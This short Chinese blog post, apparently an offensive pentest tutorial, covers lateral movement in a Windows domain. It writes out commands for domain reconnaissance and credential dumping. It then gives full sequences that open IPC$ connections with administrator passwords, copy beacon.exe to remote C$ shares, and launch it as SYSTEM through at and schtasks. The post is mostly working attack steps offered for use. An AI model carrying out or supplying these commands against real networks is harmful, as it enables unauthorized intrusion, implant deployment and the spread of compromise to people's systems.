当前位置: 首页 > article >正文

内网渗透横向移动1

1.信息收集

(1)判断域控

shell net time /domain

shell ping OWA2010CN-God.god.org

(2)主机探测

浏览探测->网络探测

主机列表显示:

(3)域用户收集:
shell net user /domain

(4)密码抓取

凭证提取->抓取hash/抓取明文密码

2.at命令横向移动

net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator  #建立ipc连接

copy beacon.exe \\192.168.3.21\c$#拷贝执行文件到目标机器

at \\192.168.3.21 15:47 c:\beacon.exe#添加计划任务

3.schtasks >=Windows2012

net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator#建立ipc连接

copy beacon.exe \\192.168.3.32\c$ #复制文件到其C

schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn beacon /sc

DAILY /tr c:\beacon.exe /F #创beacon任务对应执行文件

schtasks /run /s 192.168.3.32 /tn beacon /i #运行beacon任务

schtasks /delete /s 192.168.3.21 /tn beacon /f#删除beacon任务


http://www.kler.cn/a/408691.html

相关文章:

  • 微机原理与接口技术——可编定时器,计数芯片8253.8254
  • leetcode day13 贪心 45+55
  • CPU命名那些事
  • Linux网络——网络层
  • Java算法OJ(10)哈希表练习
  • Android 常用命令和工具解析之内存相关
  • 鸿蒙开发——根据背景图片来构建特定颜色的蒙版
  • mac安装appuim
  • PD虚拟机启动后 Mac主机无法上网解决教程
  • 树莓派——Opencv_python基本操作
  • 【接口封装】——5、绘制头像
  • c++的类和对象(1)
  • PDF内容提取,MinerU使用
  • vscode + ROS 配置快捷编译
  • 【C++】从C语言到C++学习指南
  • GESP语法知识(快速排序)
  • VRRP虚拟路由实现主备设备负载分担
  • 在Spring Boot项目中集成RabbitMQ消息中间件
  • JSON 性能测试 - WastJson 性能也很快
  • 基于LiteFlow的风控系统指标版本控制
  • ApiChain 从迭代测试用例到项目回归测试 核心使用教程
  • 知乎日报——第二周
  • 乐鑫ESP32物联网方案,设备人机交互技术应用,启明云端乐鑫代理商
  • Java连接MySQL数据库进行增删改查操作
  • Flink-Source的使用
  • (二)手势识别——动作模型训练【代码+数据集+python环境(免安装)+GUI系统】